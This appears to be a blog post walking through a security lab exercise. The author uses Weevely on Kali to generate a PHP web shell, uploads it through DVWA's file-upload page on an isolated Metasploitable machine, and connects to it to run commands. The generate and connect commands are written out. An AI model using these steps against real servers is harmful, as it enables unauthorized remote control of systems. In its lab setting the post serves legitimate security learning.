We installed and setup Metasploitable in our lab to test various Kali Linux security tools.
In this post we will be checking out Weeveley. Weeveley is preinstalled on Kali Linux and we will use weeveley to connect to the dvwa (damn vulnerable web application running on our Metasploitable machine.

Our network is simple as shown below. Our Kali machine and Metasploitable machines can communicated to eachother as they are part of the same network, but they cannot communicate to the internet or the host machine as the communication is blocked using a firewall running on pfsense.

Launch DVWA and update security settings

From the Kali machine, we launched Firefox and navigated to http://192.168.1.111/dvwa

Type the user name: “admin” and password: “password” to logon to the DVWA
Click DVWA Security and change the security to low.

Launch Weevely and create payload

From Kali, we ran the following command to create a payload that we will upload to the DVWA site and then take control of the server running DVWA.

┌──(test㉿kali)-[~/Desktop]└─$ weevely generate testpassword test.php
Generated ‘test.php’ with password ‘testpassword’ of 687 byte size.

Above command generated a file called “test.php” with a password of “tetspassword”.
Following is the content of this file:

Upload the file to DVWA

Next, we will upload the file “test.php” to the DVWA.

Connect to DVWA from Kali

Next, we will connect to the metasploitable server using weevely.
Run the following command to connect to DVWA:

┌──(test㉿kali)-[~/Desktop]└─$ weevely http://192.168.1.111/dvwa/hackable/uploads/test.php testpassword

As connection is successful, we can proceed with the next steps.

Lets run some commands on the remote server

Now, we will run some Weevely commands to see if we are successful.

Running the ls command gives us the output of the files on the remote server directory as shown below:

Running “:system_info” gives the following output. (No idea about the error 500 yet. More than likely it is the webserver throwing the error but we have not found the reason for it yet)

This was a good exercise to create a payload and then establish connection to the remote target.

As we learn more, we will increase the security on DVWA and find ways to upload our payload to the server while the security setting is increased.

Thank you for reading.